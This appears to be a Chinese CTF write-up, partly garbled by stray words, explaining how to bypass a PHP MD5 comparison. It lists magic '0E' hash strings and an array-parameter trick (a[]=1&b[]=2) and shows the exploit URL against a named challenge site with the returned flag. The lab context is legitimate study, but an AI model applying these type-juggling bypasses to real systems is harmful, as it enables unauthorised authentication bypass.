一个网页,不妨设URL为http://haha.com
,打开以后是这样的php
if (isset($_GET['a']) and isset($_GET['b'])) { if ($_GET['a'] != $_GET['b']) { if (md5($_GET['a']) === md5($_GET['b'])) { echo ('Flag: '.$flag); }else { echo 'Wrong.'; } } }
根据这段代码,能够看出;程序员
!==
引用上的不等若是提交http://haha.com?a=3&b=2
,返回wrong
若是提交http://haha.com?a=3&b=3
,跟没带参数同样,由于没有进入到那层判断中去
问,怎么提交才能获得flag数组
PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每个以”0E”开头的哈希值都解释为0,因此若是两个不一样的密码通过哈希之后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。
常见的payload有安全
QNKCDZO 240610708 s878926199a s155964671a s214587387a s214587387a sha1(str) sha1('aaroZmOk') sha1('aaK1STfY') sha1('aaO8zKZF') sha1('aa3OFF9m')
同时MD5不能处理数组,如有如下判断则可用数组绕过网络
if(@md5($_GET['a']) == @md5($_GET['b'])) { echo "yes"; } //http://127.0.0.1/1.php?a[]=1&b[]=2
URL能够传递数组参数,形式是http://haha.com?x[]=1&x[]=2&x[]=3
,这样就提交了一个x[]={1,2,3}的数组。
在PHP中,MD5是不能处理数组的,md5(数组)会返回null,因此md5(a[])==null,md5(b[])==null,md5(a[])=md5(b[])=null,这样就获得答案了。函数
http://butian.secbox.cn/flag.php?a[]=1&b[]=2
返回结果.net
Flag: flag{1bc29b36f623ba82aaf6724fd3b16718} if (isset($_GET['a']) and isset($_GET['b'])) { if ($_GET['a'] != $_GET['b']) { if (md5($_GET['a']) === md5($_GET['b'])) { echo ('Flag: '.$flag); }else { echo 'Wrong.'; } } }
一开始我还觉得要找到两个md5相同的字符串,百度一番未曾找到。只找到一个fastcoll.exe文件碰撞器,内容都是二进制的,不是字符串。code
直接搜索PHP、MD5,就发现原来这题跟密码学半毛钱关系没有,只是简简单单的PHP语言漏洞。
因而余有叹焉,PHP是地球上最垃圾的语言,一方面养活着一大群抱残守缺的程序员,另外一方面也养活着一批PHP安全方面的专家。程序员这不是自娱自乐吗?用Java哪来的这么多奇葩问题,强类型的安全性天然而然,一切都是肯定的,弱类型带来了太多的可能性。脚本写起来虽然方便,却最好只在本地使用而不要放在易受攻击的地方。blog